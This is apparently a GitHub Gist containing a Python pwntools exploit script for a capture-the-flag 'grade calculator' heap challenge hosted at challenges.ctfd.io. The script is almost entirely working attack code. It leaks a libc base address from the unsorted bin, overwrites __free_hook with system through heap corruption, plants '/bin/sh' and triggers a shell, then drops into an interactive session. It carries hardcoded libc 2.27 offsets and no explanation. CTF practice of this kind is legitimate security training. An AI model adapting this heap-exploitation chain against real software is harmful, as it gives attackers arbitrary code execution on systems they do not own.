Last active
March 7, 2021 23:24
-
-
Save hkraw/1965a094bd504016726694530dd104a1 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from pwn import * | |
| from past.builtins import xrange | |
| from time import sleep | |
| import random | |
| #Utils | |
| def addcategory(weight,grades): | |
| io.sendlineafter('> ','1') | |
| io.sendlineafter(')\n',f'{weight}') | |
| io.sendlineafter('?\n',f'{grades}') | |
| def setgrades(category,newsize,grades,oldsize=None,shell=False): | |
| io.sendlineafter('> ','2') | |
| io.sendlineafter('-16)\n',f'{category}') | |
| io.sendlineafter('):\n',f'{newsize}') | |
| if shell == True: return True | |
| if newsize != 0: | |
| for i in range(newsize+1): | |
| try: io.sendlineafter('grade:\n',f'{grades[i]}') | |
| except: io.sendlineafter('grade:\n',f'{0x21}') | |
| else: | |
| for i in range(oldsize): | |
| try: io.sendlineafter('grade:\n',f'{grades[i]}') | |
| except: io.sendlineafter('grade:\n',f'{0x21}') | |
| def viewreport(): | |
| io.sendlineafter('> ','3') | |
| return io.recvuntil('Grade Calculator\n') | |
| #libc 2.27 | |
| unsorted_bin_offset = 0x3ebca0 | |
| system = 0x4f440 | |
| __free_hook = 0x3ed8e8 | |
| #Exploit | |
| if __name__ == '__main__': | |
| # io = process('./gcalc',env={'LD_PRELOAD':'./libc.so.6'}) | |
| io = remote('challenges.ctfd.io',30253) | |
| addcategory(1,0x18) #1 | |
| addcategory(1,0x418) #2 | |
| [addcategory(1,0x18) for i in xrange(2)] #3 ~ 4 | |
| setgrades(1,0,[0x41 if i is 0x18 else 2 for i in xrange(0x19)],0x19) | |
| setgrades(2,0x418,[0x21 for i in xrange(0x419)]) | |
| leaks = viewreport().split(b'Grades:')[3].replace(b' ',b'').split(b',')[0:8][::-1] | |
| libc_leak = 0 | |
| j = 7 | |
| for i in xrange(8): | |
| libc_leak += ((int(leaks[i])&0xff)<<8*j) | |
| j -= 1 | |
| libc_base = libc_leak - unsorted_bin_offset | |
| print(hex(libc_base)) | |
| addcategory(1,0x18) #5 | |
| setgrades(3,0x47,[0x21 for i in xrange(0x48)]) | |
| setgrades(5,0x47,[0x21 for i in xrange(0x48)]) | |
| addcategory(1,0x18) #6 | |
| setgrades(6,0,p64(libc_base+__free_hook),0x19) | |
| addcategory(1,0x8) #7 | |
| bin_sh_list = [] | |
| [(bin_sh_list.append((0x68732f6e69622f) >> 8*i)) for i in xrange(8)] | |
| setgrades(7,0,[bin_sh_list[i]&0xff for i in xrange(8)],0x9) | |
| addcategory(1,0x8) #8 | |
| setgrades(8,0,p64(libc_base+system),0x9) | |
| setgrades(7,0x18,[0x21 for i in xrange(0x19)],shell=True) | |
| io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment